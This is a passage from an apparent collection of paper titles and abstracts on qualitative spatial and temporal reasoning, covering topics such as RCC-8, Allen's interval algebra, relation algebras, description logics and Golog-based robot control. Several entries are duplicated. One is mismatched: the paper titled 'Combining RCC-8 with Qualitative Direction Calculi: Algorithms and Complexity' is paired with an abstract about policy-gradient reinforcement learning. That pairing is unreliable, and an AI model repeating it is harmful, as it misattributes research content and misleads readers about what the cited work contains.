to qualitative spatial reasoning is based on directional orientation information as available through perceptual processes. qualitative orientations in two-dimensional space are given by the relation between a point and a vector. A basic iconic notation for spatial orientation relations which exploits the spatial structure of the domain is presented, and a variety of ways in which these relations can be manipulated and combined for spatial reasoning is explored. > --- paper_title: Categorical methods in qualitative reasoning: the case for weak representations paper_content: This paper argues for considering qualitative spatial and temporal reasoning in algebraic and category-theoretic terms. A central notion in this context is that of weak representation (WR) of the algebra governing the calculus. WRs are ubiquitous in qualitative reasoning, appearing both as domains of interpretation and as constraints. Defining the category of WRs allows us to express the basic notion of satisfiability (or consistency) in a simple way, and brings clarity to the study of various variants of consistency. The WRs of many popular calculi are of interest in themselves. Moreover, the classification of WRs leads to non-trivial model-theoretic results. The paper provides a not-too-technical introduction to these topics and illustrates it with simple examples. --- paper_title: Qualitative Spatial and Temporal Reasoning: Efficient Algorithms for Everyone paper_content: In the past years a lot of research effort has been put into finding tractable subsets of spatial and temporal calculi. It has been shown empirically that large tractable subsets of these calculi not only provide efficient algorithms for reasoning problems that can be expressed with relations contained in the tractable subsets, but also surprisingly efficient solutions to the general, NP-hard reasoning problems of the full calculi. An important step in this direction was the refinement algorithm which provides a heuristic for proving tractability of given subsets of relations. In this paper we extend the refinement algorithm and present a procedure which identifies large tractable subsets of spatial and temporal calculi automatically without any manual intervention and without the need for additional NP-hardness proofs. While we can only guarantee tractability of the resulting sets, our experiments show that for RCC8 and the Interval Algebra, our procedure automatically identifies all maximal tractable subsets. Using our procedure, other researchers and practitioners can automatically develop efficient reasoning algorithms for their spatial or temporal calculi without any theoretical knowledge about how to formally analyse these calculi. --- paper_title: PelletSpatial: A Hybrid RCC-8 and RDF/OWL Reasoning and Query Engine paper_content: In this paper, we present PelletSpatial, a qualitative spatial reasoning engine implemented on top of Pellet. PelletSpatial provides consistency checking and query answering over spatial data represented with the Region Connection Calculus (RCC). It supports all RCC-8 relations as well as standard RDF/OWL semantic relations, both represented in RDF/OWL. As such, it can answer mixed SPARQL queries over both relation types. PelletSpatial implements two RCC reasoners: (a) A reasoner based on the semantics preserving translation of RCC relations to OWL-DL class axioms and (b) a reasoner based on the RCC composition table that implements a path-consistency algorithm. We discuss the details of two implementation approaches and focus on some of their respective advantages and disadvantages. --- paper_title: The RacerPro knowledge representation and reasoning system paper_content: RacerPro is a software system for building applications based on ontologies. The backbone of RacerPro is a description logic reasoner. It provides inference services for terminological knowledge as well as for representations of knowledge about individuals. Based on new optimization techniques and techniques that have been developed in the research field of description logics throughout the years, a mature architecture for typical-case reasoning tasks is provided. The system has been used in hundreds of research projects and industrial contexts throughout the last twelve years. W3C standards as well as detailed feedback reports from numerous users have influenced the design of the system architecture in general, and have also shaped the RacerPro knowledge representation and interface languages. With its query and rule languages, RacerPro goes well beyond standard inference services provided by other OWL reasoners. --- paper_title: SPASS Version 2.0 paper_content: Spass is an automated theorem prover for full first-order logic with equality. This system description provides an overview of recent developments in Spass 2.0, including among others an implementation of contextual rewriting, refinements of the clause normal form transformation, and enhancements of the inference engine. --- paper_title: Reasoning about Cardinal Directions between Extended Objects paper_content: Direction relations between extended spatial objects are important commonsense knowledge. Recently, Goyal and Egenhofer proposed a relation model, known as the cardinal direction calculus (CDC), for representing direction relations between connected plane regions. The CDC is perhaps the most expressive qualitative calculus for directional information, and has attracted increasing interest from areas such as artificial intelligence, geographical information science, and image retrieval. Given a network of CDC constraints, the consistency problem is deciding if the network is realizable by connected regions in the real plane. This paper provides a cubic algorithm for checking the consistency of complete networks of basic CDC constraints, and proves that reasoning with the CDC is in general an NP-complete problem. For a consistent complete network of basic CDC constraints, our algorithm returns a 'canonical' solution in cubic time. This cubic algorithm is also adapted to check the consistency of complete networks of basic cardinal constraints between possibly disconnected regions. --- paper_title: Qualitative constraint calculi: Heterogeneous verification of composition tables paper_content: In the domain of qualitative constraint reasoning, a subfield of AI which has evolved in the past 25 years, a large number of calculi for efficient reasoning about spatial and temporal entities has been developed. Reasoning techniques developed for these constraint calculi typically rely on so-called composition tables of the calculus at hand, which allow for replacing semantic reasoning by symbolic operations. Often these composition tables are developed in a quite informal, pictorial manner—a method which seems to be error-prone. In view of possible safety critical applications of qualitative calculi, however, it is desirable to formally verify these composition tables. In general, the verification of composition tables is a tedious task, in particular in cases where the semantics of the calculus depends on higher-order constructs such as sets. In this paper we address this problem by presenting a heterogeneous proof method that allows for combining a higherorder proof assistance system (such as Isabelle) with an automatic (first order) reasoner (such as SPASS or VAMPIRE). The benefit of this method is that the number of proof obligations that is to be proven interactively with a semi-automatic reasoner can be minimized to an acceptable level. --- paper_title: Connecting qualitative spatial and temporal representations by propositional closure paper_content: This paper establishes new relationships between existing qualitative spatial and temporal representations. Qualitative spatial and temporal representation (QSTR) is concerned with abstractions of infinite spatial and temporal domains, which represent configurations of objects using a finite vocabulary of relations, also called a qualitative calculus. Classically, reasoning in QSTR is based on constraints. An important task is to identify decision procedures that are able to handle constraints from a single calculus or from several calculi. In particular the latter aspect is a longstanding challenge due to the multitude of calculi proposed. In this paper we consider propositional closures of qualitative constraints which enable progress with respect to the longstanding challenge. Propositional closure allows one to establish several translations between distinct calculi. This enables joint reasoning and provides new insights into computational complexity of individual calculi. We conclude that the study of propositional languages instead of previously considered purely relational languages is a viable research direction for QSTR leading to expressive formalisms and practical algorithms. --- paper_title: An Algebra of Qualitative Taxonomical Relations for Ontology Alignments paper_content: Algebras of relations were shown useful in managing ontology alignments. They make it possible to aggregate alignments disjunctively or conjunctively and to propagate alignments within a network of ontologies. The previously considered algebra of relations contains taxonomical relations between classes. However, compositional inference using this algebra is sound only if we assume that classes which occur in alignments have nonempty extensions. Moreover, this algebra covers relations only between classes. Here we introduce a new algebra of relations, which, first, solves the limitation of the previous one, and second, incorporates all qualitative taxonomical relations that occur between individuals and concepts, including the relations "is a" and "is not". We prove that this algebra is coherent with respect to the simple semantics of alignments. --- paper_title: Reasoning about temporal relations: a maximal tractable subclass of Allen's interval algebra paper_content: We introduce a new subclass of Allen's interval algebra we call "ORD-Horn subclass," which is a strict superset of the "pointisable subclass." We prove that reasoning in the ORD-Horn subclass is a polynomial-time problem and show that the path-consistency method is sufficient for deciding satisfiability. Further, using an extensive machine-generated case analysis, we show that the ORD-Horn subclass is a maximal tractable subclass of the full algebra (assuming P≠NP). In fact, it is the unique greatest tractable subclass amongst the subclasses that contain all basic relations. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: Relation Algebras and their Application in Temporal and Spatial Reasoning paper_content: Qualitative temporal and spatial reasoning is in many cases based on binary relations such as before, after, starts, contains, contact, part of, and others derived from these by relational operators. The calculus of relation algebras is an equational formalism; it tells us which relations must exist, given several basic operations, such as Boolean operations on relations, relational composition and converse. Each equation in the calculus corresponds to a theorem, and, for a situation where there are only finitely many relations, one can construct a composition table which can serve as a look up table for the relations involved. Since the calculus handles relations, no knowledge about the concrete geometrical objects is necessary. In this sense, relational calculus is "pointless". Relation algebras were introduced into temporal reasoning by Allen (1983, Communications of the ACM 26(1), 832--843) and into spatial reasoning by Egenhofer and Sharma (1992, Fifth International Symposium on Spatial Data Handling, Charleston, SC). The calculus of relation algebras is also well suited to handle binary constraints as demonstrated e.g. by Ladkin and Maddux (1994, Journal of the ACM 41(3), 435--469). In the present paper I will give an introduction to relation algebras, and an overview of their role in qualitative temporal and spatial reasoning. --- paper_title: A new approach to cyclic ordering of 2D orientations using ternary relation algebras paper_content: Abstract In Tarski's formalisation, the universe of a relation algebra (RA) consists of a set of binary relations. A first contribution of this work is the introduction of RAs whose universe is a set of ternary relations: these support rotation as an operation in addition to those present in Tarski's formalisation. Then we propose two particular RAs: a binary RA, CYC b , whose universe is a set of (binary) relations on 2D orientations; and a ternary RA, CYC t , whose universe is a set of (ternary) relations on 2D orientations. The RA CYC t , more expressive than CYC b , constitutes a new approach to cyclic ordering of 2D orientations. An atom of CYC t expresses for triples of orientations whether each of the three orientations is equal to, to the left of, opposite to, or to the right of each of the other two orientations. CYC t has 24 atoms and the elements of its universe consist of all possible 2 24 subsets of the set of all atoms. Amongst other results, 1. we provide for CYC t a constraint propagation procedure computing the closure of a problem under the different operations, and show that the procedure is polynomial, and complete for a subset including all atoms; 2. we prove that another subset, expressing only information on parallel orientations, is NP-complete; 3. we show that provided that a subset S of CYC t includes two specific elements, deciding consistency for a problem expressed in the closure of S can be polynomially reduced to deciding consistency for a problem expressed in S ; and 4. we derive from the previous result that for both RAs we “jump” from tractability to intractability if we add the universal relation to the set of all atoms. A comparison to the most closely related work in the literature indicates that the approach is promising. --- paper_title: The finest of its class: The natural point-based ternary calculus for qualitative spatial reasoning paper_content: In this paper, a ternary qualitative calculus ${\mathcal LR}$ for spatial reasoning is presented that distinguishes between left and right. A theory is outlined for ternary point-based calculi in which all the relations are invariant when all points are mapped by rotations, scalings, or translations (RST relations). For this purpose, we develop methods to determine arbitrary transformations and compositions of RST relations. We pose two criteria which we call practical and natural. ‘Practical' means that the relation system should be closed under transformations, compositions and intersections and have a finite base that is jointly exhaustive and pairwise disjoint. This implies that the well-known path consistency algorithm [10] can be used to conclude implicit knowledge. ‘Natural' calculi are close to our natural way of thinking because the base relations and their complements are connected. The main result of the paper is the identification of a maximally refined calculus amongst the practical natural RST calculi, which turns out to be very similar to Ligozat's flip-flop calculus. From that it follows, e.g., that there is no finite refinement of the TPCC calculus by Moratz et al that is closed under transformations, composition, and intersection. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: Relation Algebras and their Application in Temporal and Spatial Reasoning paper_content: Qualitative temporal and spatial reasoning is in many cases based on binary relations such as before, after, starts, contains, contact, part of, and others derived from these by relational operators. The calculus of relation algebras is an equational formalism; it tells us which relations must exist, given several basic operations, such as Boolean operations on relations, relational composition and converse. Each equation in the calculus corresponds to a theorem, and, for a situation where there are only finitely many relations, one can construct a composition table which can serve as a look up table for the relations involved. Since the calculus handles relations, no knowledge about the concrete geometrical objects is necessary. In this sense, relational calculus is "pointless". Relation algebras were introduced into temporal reasoning by Allen (1983, Communications of the ACM 26(1), 832--843) and into spatial reasoning by Egenhofer and Sharma (1992, Fifth International Symposium on Spatial Data Handling, Charleston, SC). The calculus of relation algebras is also well suited to handle binary constraints as demonstrated e.g. by Ladkin and Maddux (1994, Journal of the ACM 41(3), 435--469). In the present paper I will give an introduction to relation algebras, and an overview of their role in qualitative temporal and spatial reasoning. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: A Condensed Semantics for Qualitative Spatial Reasoning About Oriented Straight Line Segments paper_content: More than 15 years ago, a set of qualitative spatial relations between oriented straight line segments (dipoles) was suggested by Schlieder. However, it turned out to be difficult to establish a sound constraint calculus based on these relations. In this paper, we present the results of a new investigation into dipole constraint calculi which uses algebraic methods to derive sound results on the composition of relations of dipole calculi. This new method, which we call condensed semantics, is based on an abstract symbolic model of a specific fragment of our domain. It is based on the fact that qualitative dipole relations are invariant under orientation preserving affine transformations. The dipole calculi allow for a straightforward representation of prototypical reasoning tasks for spatial agents. As an example, we show how to generate survey knowledge from local observations in a street network. The example illustrates the fast constraint-based reasoning capabilities of dipole calculi. We integrate our results into two reasoning tools which are publicly available. --- paper_title: On the consistency problem for the INDU calculus paper_content: In this paper, we further investigate the consistency problem for the qualitative temporal calculus INDU introduced by A. K. Pujari et al. (1999). We prove the intractability of the consistency problem for the subset of preconvex relations. On the other hand, we show the tractability of strongly preconvex relations. Furthermore, we also define another interesting set of relations for which the consistency problem can be decided by a method similar to the usual path-consistency method. --- paper_title: Relations between spatial calculi about directions and orientations paper_content: Qualitative spatial descriptions characterize essential properties of spatial objects or configurations by relying on relative comparisons rather than measuring. Typically, in qualitative approaches only relatively coarse distinctions between configurations are made. Qualitative spatial knowledge can be used to represent incomplete and underdetermined knowledge in a systematic way. This is especially useful if the task is to describe features of classes of configurations rather than individual configurations. ::: ::: Although reasoning with them is generally NP-hard (even ∃IR-complete), relative directions are important because they play a key role in human spatial descriptions and there are several approaches how to represent them using qualitative methods. In these approaches directions between spatial locations can be expressed as constraints over infinite domains, e.g. the Euclidean plane. The theory of relation algebras has been successfully applied to this field. Viewing relation algebras as universal algebras and applying and modifying standard tools from universal algebra in this work, we (re)define notions of qualitative constraint calculus, of homomorphism between calculi, and of quotient of calculi. Based on this method we derive important properties for spatial calculi from corresponding properties of related calculi. From a conceptual point of view these formal mappings between calculi are a means to translate between different granularities. --- paper_title: Consistency in Networks of Relations paper_content: Artificial intelligence tasks which can be formulated as constraint satisfaction problems, with which this paper is for the most part concerned, are usually by solved backtracking the examining the thrashing behavior that nearly always accompanies backtracking, identifying three of its causes and proposing remedies for them we are led to a class of algorithms whoch can profitably be used to eliminate local (node, arc and path) inconsistencies before any attempt is made to construct a complete solution. A more general paradigm for attacking these tasks is the altenation of constraint manipulation and case analysis producing an OR problem graph which may be searched in any of the usual ways. ::: ::: Many authors, particularly Montanari and Waltz, have contributed to the development of these ideas; a secondary aim of this paper is to trace that history. The primary aim is to provide an accessible, unified framework, within which to present the algorithms including a new path consistency algorithm, to discuss their relationships and the may applications, both realized and potential of network consistency algorithms. --- paper_title: Qualitative spatial and temporal reasoning with AND/OR linear programming paper_content: This paper explores the use of generalized linear programming techniques to tackle two long-standing problems in qualitative spatio-temporal reasoning: Using LP as a unifying basis for reasoning, one can jointly reason about relations from different qualitative calculi. Also, concrete entities (fixed points, regions fixed in shape and/or position, etc.) can be mixed with free variables. Both features are important for applications but cannot be handled by existing techniques. In this paper we discuss properties of encoding constraint problems involving spatial and temporal relations. We advocate the use of AND/OR graphs to facilitate efficient reasoning and we show feasibility of our approach. --- paper_title: Qualitative constraint satisfaction problems: An extended framework with landmarks paper_content: Dealing with spatial and temporal knowledge is an indispensable part of almost all aspects of human activity. The qualitative approach to spatial and temporal reasoning, known as Qualitative Spatial and Temporal Reasoning (QSTR), typically represents spatial/temporal knowledge in terms of qualitative relations (e.g., to the east of, after), and reasons with spatial/temporal knowledge by solving qualitative constraints. When formulating qualitative constraint satisfaction problems (CSPs), it is usually assumed that each variable could be ''here, there and everywhere''. Practical applications such as urban planning, however, often require a variable to take its value from a certain finite domain, i.e. it is required to be 'here or there, but not everywhere'. Entities in such a finite domain often act as reference objects and are called ''landmarks'' in this paper. The paper extends the classical framework of qualitative CSPs by allowing variables to take values from finite domains. The computational complexity of the consistency problem in this extended framework is examined for the five most important qualitative calculi, viz. Point Algebra, Interval Algebra, Cardinal Relation Algebra, RCC5, and RCC8. We show that all these consistency problems remain in NP and provide, under practical assumptions, efficient algorithms for solving basic constraints involving landmarks for all these calculi. --- paper_title: Combining RCC-8 with Qualitative Direction Calculi : Algorithms and Complexity ∗ paper_content: We investigate the problem of non-covariant behavior of policy gradient reinforcement learning algorithms. The policy gradient approach is amenable to analysis by information geometric methods. This leads us to propose a natural metric on controller parameterization that results from considering the manifold of probability distributions over paths induced by a stochastic controller. Investigation of this approach leads to a covariant gradient ascent rule. Interesting properties of this rule are discussed, including its relation with actor-critic style reinforcement learning algorithms. The algorithms discussed here are computationally quite efficient and on some interesting problems lead to dramatic performance improvement over noncovariant rules. --- paper_title: Qualitative Spatio-Temporal Reasoning with RCC-8 and Allen's Interval Calculus: Computational Complexity paper_content: There exist a number of qualitative constraint calculi that are used to represent and reason about temporal or spatial configurations. However, there are only very few approaches aiming to create a spatio-temporal constraint calculus. Similar to Bennett et al., we start with the spatial calculus RCC-8 and Allen's interval calculus in order to construct a qualitative spatio-temporal calculus. As we will show, the basic calculus is NP-complete, even if we only permit base relations. When adding the restriction that the size of the spatial regions persists over time, or that changes are continuous, the calculus becomes more useful, but the satisfiability problem appears to be much harder. Nevertheless, we are able to show that satisfiability is still in NP. --- paper_title: Qualitative Representation of Spatial Knowledge paper_content: Qualitativeness.- A cognitive perspective on knowledge representation.- Qualitative representation of positions in 2-D.- Reasoning with qualitative representations.- Applications.- Extensions of the basic model.- Relevant related work.- Conclusion. --- paper_title: Multi-Dimensional Modal Logic as a Framework for Spatio-Temporal Reasoning paper_content: In this paper we advocate the use of multi-dimensional modal logics as a framework for knowledge representation and, in particular, for representing spatio-temporal information. We construct a two-dimensional logic capable of describing topological relationships that change over time. This logic, called PSTL (Propositional Spatio-Temporal Logic) is the Cartesian product of the well-known temporal logic PTL and the modal logic S4u, which is the Lewis system S4 augmented with the universal modality. Although it is an open problem whether the full PSTL is decidable, we show that it contains decidable fragments into which various temporal extensions (both point-based and interval based) of the spatial logic RCC-8 can be embedded. We consider known decidability and complexity results that are relevant to computation with multi-dimensional formalisms and discuss possible directions for further research. --- paper_title: Viewing composition tables as axiomatic systems paper_content: Axiomatic systems and composition tables are often seen asalternative ways of specifying the semantic interrelations ofrelations for qualitative reasoning. Axiomatic characterizationsusually specify ontological assumptions concerning the domain ofthe relations and introduce a taxonomic system of relations that,on the one hand, serves to specify the relations and, on the otherhand, supports the communication of the intended meaning.In thisarticle, composition tables are seen as a specific form ofaxiomatic theories that can also be combined with a taxonomicsystem of relations. On this basis, the content of compositiontables can be reformulated in a simplified way. This simplificationsupports the construction of such tables parallel to thedevelopment of the axiomatic specification or on the basis of agiven axiomatic characterization. --- paper_title: Spatial reasoning in RCC-8 with Boolean region terms paper_content: We extend the expressive power of the region connection calculus RCC-8 by allowing applications of the 8 binary relations of RCC-8 not only to atomic regions but also to Boolean combinations of them. It is shown that the statisfiability problem for the extended language in arbitrary topological spaces is still in NP; however, it becomes PSPACE-complete if only the Euclidean spaces ℝn, n > 0, are regarded as possible interpretations. In particular, in contrast to pure RCC-8, the new language is capable of distinguishing between connected and non-connected topological spaces. --- paper_title: Multidimensional Mereotopology with Betweenness paper_content: Qualitative reasoning about commonsense space often involves entities of different dimensions. We present a weak axiomatization of multidimensional qualitative space based on 'relative dimension' and dimension-independent 'containment' which suffice to define basic dimension-dependent mereotopological relations. We show the relationships to other meoreotopologies and to incidence geometry. The extension with betweenness, a primitive of relative position, results in a first-order theory that qualitatively abstracts ordered incidence geometry. --- paper_title: The Mathematical Morpho-Logical View on Reasoning about Space paper_content: Qualitative reasoning about mereotopological relations has been extensively investigated, while more recently geometrical and spatio-temporal reasoning are gaining increasing attention. We propose to consider mathematical morphology operators as the inspiration for a new language and inference mechanism to reason about space. Interestingly, the proposed morpho-logic captures not only traditional mereotopological relations, but also notions of relative size and morphology. The proposed representational framework is a hybrid arrow logic theory for which we define a resolution calculus which is, to the best of our knowledge, the first such calculus for arrow logics. --- paper_title: An Axiomatic Approach to the Spatial Relations Underlying Left-Right and in Front of-Behind paper_content: This paper presents an axiomatic characterization of spatial orderings in the plane and of concepts underlying intrinsic and deictic uses of spatial terms such as in front of, behind, left and right. This characterization differs in several aspects from existing theories that either employ systems of coordinate axes or systems of regions to specify the meaning of such expressions. We argue that the relations given by in front of and behind can be modeled on the basis of linear orders and on the basis of axes, whereas the relations given by left and right can be modeled as planar and on the basis of regions. The explicit characterization of the means necessary to specify the intrinsic and deictic uses thereby sheds light on the structures contributed by different frames of reference and therefore contributes to understanding the deictic/intrinsic-distinction. --- paper_title: Logical Representations for Automated Reasoning about Spatial Relationships paper_content: This thesis investigates logical representations for describing and reasoning about spatial situations. Previously proposed theories of spatial regions are investigated in some detail - especially the 1st-order theory of Randell, Cui and Cohn (1992). The difficulty of achieving effective automated reasoning with these systems is observed. ::: ::: A new approach is presented, based on encoding spatial relations in formulae of 0-order ('propositional') logics. It is proved that entailment, which is valid according to the standard semantics for these logics, is also valid with respect to the spatial interpretation. Consequently, well-known mechanisms for propositional reasoning can be applied to spatial reasoning. Specific encodings of topological relations into both the modal logic S4 and the intuitionistic propositional calculus are given. The complexity of reasoning using the intuitionistic representation is examined and a procedure is presented with is shown to be of O(n3) complexity in the number of relations involved. ::: ::: In order to make this kind of representation sufficiently expressive the concepts of model constraint and entailment constraint are introduced. By means of this distinction a 0-order formula may be used either to assert or to deny that a certain spatial constraint holds of some situation. It is shown how the proof theory of a 0-order logical language can be extended by a simple meta-level generalisation to accommodate a representation involving these two types of formula. ::: ::: A number of other topics are dealt with: a decision procedure based on quantifier elimination is given for a large class of formulae within a 1st-order topological language; reasoning mechanisms based on the composition of spatial relations are studied; the non-topological property of convexity is examined both from the point of view of its 1st-order characterisation and its incorporation into a 0-order spatial logic. It is suggested that 0-order representations could be employed in a similar manner to encode other spatial concepts. --- paper_title: A Tableau Algorithm for Description Logics with Concrete Domains and General TBoxes paper_content: In order to use description logics (DLs) in an application, it is crucial to identify a DL that is sufficiently expressive to represent the relevant notions of the application domain, but for which reasoning is still decidable. Two means of expressivity required by many modern applications of DLs are concrete domains and general TBoxes. The former are used for defining concepts based on concrete qualities of their instances such as the weight, age, duration, and spatial extension. The purpose of the latter is to capture background knowledge by stating that the extension of a concept is included in the extension of another concept. Unfortunately, combining concrete domains with general TBoxes often leads to DLs for which reasoning is undecidable. In this paper, we identify a general property of concrete domains that is sufficient for proving decidability of DLs with both concrete domains and general TBoxes. We exhibit some useful concrete domains, most notably a spatial one based on the RCC-8 relations that have this property. Then, we present a tableau algorithm for reasoning in DLs equipped with concrete domains and general TBoxes. --- paper_title: PelletSpatial: A Hybrid RCC-8 and RDF/OWL Reasoning and Query Engine paper_content: In this paper, we present PelletSpatial, a qualitative spatial reasoning engine implemented on top of Pellet. PelletSpatial provides consistency checking and query answering over spatial data represented with the Region Connection Calculus (RCC). It supports all RCC-8 relations as well as standard RDF/OWL semantic relations, both represented in RDF/OWL. As such, it can answer mixed SPARQL queries over both relation types. PelletSpatial implements two RCC reasoners: (a) A reasoner based on the semantics preserving translation of RCC relations to OWL-DL class axioms and (b) a reasoner based on the RCC composition table that implements a path-consistency algorithm. We discuss the details of two implementation approaches and focus on some of their respective advantages and disadvantages. --- paper_title: Pellet : A practical OWL-DL reasoner paper_content: In this paper, we present a brief overview of Pellet: a complete OWL-DL reasoner with acceptable to very good performance, extensive middleware, and a number of unique features. Pellet is the first sound and complete OWL-DL reasoner with extensive support for reasoning with individuals (including nominal support and conjunctive query), user-defined datatypes, and debugging support for ontologies. It implements several extensions to OWL-DL including a combination formalism for OWL-DL ontologies, a non-monotonic operator, and preliminary support for OWL/Rule hybrid reasoning. Pellet is written in Java and is open source. --- paper_title: The description logic handbook: theory, implementation, and applications paper_content: Description logics are embodied in several knowledge-based systems and are used to develop various real-life applications. Now in paperback, The Description Logic Handbook provides a thorough account of the subject, covering all aspects of research in this field, namely: theory, implementation, and applications. Its appeal will be broad, ranging from more theoretically oriented readers, to those with more practically oriented interests who need a sound and modern understanding of knowledge representation systems based on description logics. As well as general revision throughout the book, this new edition presents a new chapter on ontology languages for the semantic web, an area of great importance for the future development of the web. In sum, the book will serve as a unique resource for the subject, and can also be used for self-study or as a reference for knowledge representation and artificial intelligence courses. --- paper_title: SOWL: a framework for handling spatio-temporal information in OWL 2.0 paper_content: We propose SOWL, an ontology for representing and reasoning over spatio-temporal information in OWL. Building upon well established standards of the semantic web (OWL 2.0, SWRL) SOWL enables representation of static as well as of dynamic information based on the 4D-fluents (or, equivalently, on the N-ary) approach. Both RCC- 8 topological and cone-shaped directional relations are integrated in SOWL. Representing both qualitative temporal and spatial information (i.e., information whose temporal or spatial extents are unknown such as "left-of" for spatial and "before" for temporal relations) in addition to quantitative information (i.e., where temporal and spatial information is defined precisely) is a distinctive feature of SOWL. The SOWL reasoner is capable of inferring new relations and checking their consistency, while retaining soundness, completeness, and tractability over the supported sets of relations. --- paper_title: Logic-based robot control in highly dynamic domains paper_content: In this paper, we present the robot programming and planning language Readylog, a Golog dialect, which was developed to support the decision making of robots acting in dynamic real-time domains, such as robotic soccer. The formal framework of Readylog, which is based on the situation calculus, features imperative control structures such as loops and procedures, allows for decision-theoretic planning, and accounts for a continuously changing world. We developed high-level controllers in Readylog for our soccer robots in RoboCup's Middle-size league, but also for service robots and for autonomous agents in interactive computer games. For a successful deployment of Readylog on a real robot it is also important to account for the control problem as a whole, integrating the low-level control of the robot (such as localization, navigation, and object recognition) with the logic-based high-level control. In doing so, our approach can be seen as a step towards bridging the gap between the fields of robotics and knowledge representation. --- paper_title: Modelling Dynamic Spatial Systems in the Situation Calculus paper_content: Abstract We propose and systematically formalise a dynamical spatial systems approach for the modelling of changing spatial environments. The formalisation adheres to the semantics of the situation calculus and includes a systematic account of key aspects that are necessary to realize a domain-independent qualitative spatial theory that may be utilised across diverse application domains. The spatial theory is primarily derivable from the all-pervasive generic notion of “qualitative spatial calculi” that are representative of differing aspects of space. In addition, the theory also includes aspects, both ontological and phenomenal in nature, that are considered inherent in dynamic spatial systems. Foundational to the formalisation is a causal theory that adheres to the representational and computational semantics of the situation calculus. This foundational theory provides the necessary (general) mechanism required to represent and reason about changing spatial environments and also includes an account of ... --- paper_title: On-Line Decision-Theoretic Golog for Unpredictable Domains paper_content: DTGolog was proposed by Boutilier et al. as an integration of decision-theoretic (DT) planning and the programming language Golog. Advantages include the ability to handle large state spaces and to limit the search space during planning with explicit programming. Soutchanski developed a version of DTGolog, where a program is executed on-line and DT planning can be applied to parts of a program only. One of the limitations is that DT planning generally cannot be applied to programs containing sensing actions. In order to deal with robotic scenarios in unpredictable domains, where certain kinds of sensing like measuring one’s own position are ubiquitous, we propose a strategy where sensing during deliberation is replaced by suitable models like computed trajectories so that DT planning remains applicable. In the paper we discuss the necessary changes to DTGolog entailed by this strategy and an application of our approach in the RoboCup domain. --- paper_title: Reasoning with Qualitative Positional Information for Domestic Domains in the Situation Calculus paper_content: In this paper, we present a thorough integration of qualitative representations and reasoning for positional information for domestic service robotics domains into our high-level robot control. In domestic settings for service robots like in the RoboCup@Home competitions, complex tasks such as “get the cup from the kitchen and bring it to the living room” or “find me this and that object in the apartment” have to be accomplished. At these competitions the robots may only be instructed by natural language. As humans use qualitative concepts such as “near” or “far”, the robot needs to cope with them, too. For our domestic robot, we use the robot programming and plan language Readylog, our variant of Golog. In previous work we extended the action language Golog, which was developed for the high-level control of agents and robots, with fuzzy set-based qualitative concepts. We now extend our framework to positional fuzzy fluents with an associated positional context called frames. With that and our underlying reasoning mechanism we can transform qualitative positional information from one context to another to account for changes in context such as the point of view or the scale. We demonstrate how qualitative positional fluents based on a fuzzy set semantics can be deployed in domestic domains and showcase how reasoning with these qualitative notions can seamlessly be applied to a fetch-and-carry task in a RoboCup@Home scenario. --- paper_title: Using Maptrees to Characterize Topological Change paper_content: This paper further develops the theory of maptrees, introduced in [13]. There exist well-known methods, based upon combinatorial maps, for topologically complete representations of embeddings of connected graphs in closed surfaces. Maptrees extend these methods to provide topologically complete representations of embeddings of possibly disconnected graphs. The focus of this paper is the use of maptrees to admit fine-grained representations of topological change. The ability of maptrees to represent complex spatial processes is demonstrated through case studies involving conceptual neighborhoods and cellular processes. --- paper_title: Qualitative reasoning with directional relations paper_content: Qualitative spatial reasoning (QSR) pursues a symbolic approach to reasoning about a spatial domain. Qualitative calculi are defined to capture domain properties in relation operations, granting a relation algebraic approach to reasoning. QSR has two primary goals: providing a symbolic model for human common-sense level of reasoning and providing efficient means for reasoning. In this paper, we dismantle the hope for efficient reasoning about directional information in infinite spatial domains by showing that it is inherently hard to decide consistency of a set of constraints that represents positions in the plane by specifying directions from reference objects. We assume that these reference objects are not fixed but only constrained through directional relations themselves. Known QSR reasoning methods fail to handle this information. --- paper_title: The Mathematical Morpho-Logical View on Reasoning about Space paper_content: Qualitative reasoning about mereotopological relations has been extensively investigated, while more recently geometrical and spatio-temporal reasoning are gaining increasing attention. We propose to consider mathematical morphology operators as the inspiration for a new language and inference mechanism to reason about space. Interestingly, the proposed morpho-logic captures not only traditional mereotopological relations, but also notions of relative size and morphology. The proposed representational framework is a hybrid arrow logic theory for which we define a resolution calculus which is, to the best of our knowledge, the first such calculus for arrow logics. --- paper_title: RCC8 Is Polynomial on Networks of Bounded Treewidth paper_content: We construct an homogeneous (and ω-categorical) representation of the relation algebra RCC8, which is one of the fundamental formalisms for spatial reasoning. As a consequence we obtain that the network consistency problem for RCC8 can be solved in polynomial time for networks of bounded treewidth. --- paper_title: A Unifying Approach to Temporal Constraint Reasoning paper_content: Abstract We present a formalism, Disjunctive Linear Relations (DLRs), for reasoning about temporal constraints. DLRs subsume most of the formalisms for temporal constraint reasoning proposed in the literature and is therefore computationally expensive. We also present a 